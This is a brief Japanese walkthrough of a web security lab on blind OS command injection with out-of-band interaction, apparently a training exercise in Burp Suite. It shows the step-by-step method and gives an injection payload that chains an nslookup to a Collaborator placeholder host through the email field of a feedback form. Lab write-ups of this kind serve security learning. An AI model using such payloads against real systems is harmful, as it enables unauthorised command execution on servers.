Lab: Blind OS command injection with out-of-band interaction
submit feedbackをクリック
適当に文字を入れて送信
このリクエスト
POST /feedback/submit
をリピータに
emailパラメータを
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
に変更
*BURP-COLLABORATOR-SUBDOMAINの部分を選択して、右クリック
Insert Collaborator payloadします(pro版)
send
Collaboratorタブに移動して、Poll nowをクリック(pro版)
dnsプロトコルで、外部サーバーに送信された通信を確認できる
クリアされていた!
–)v
コメント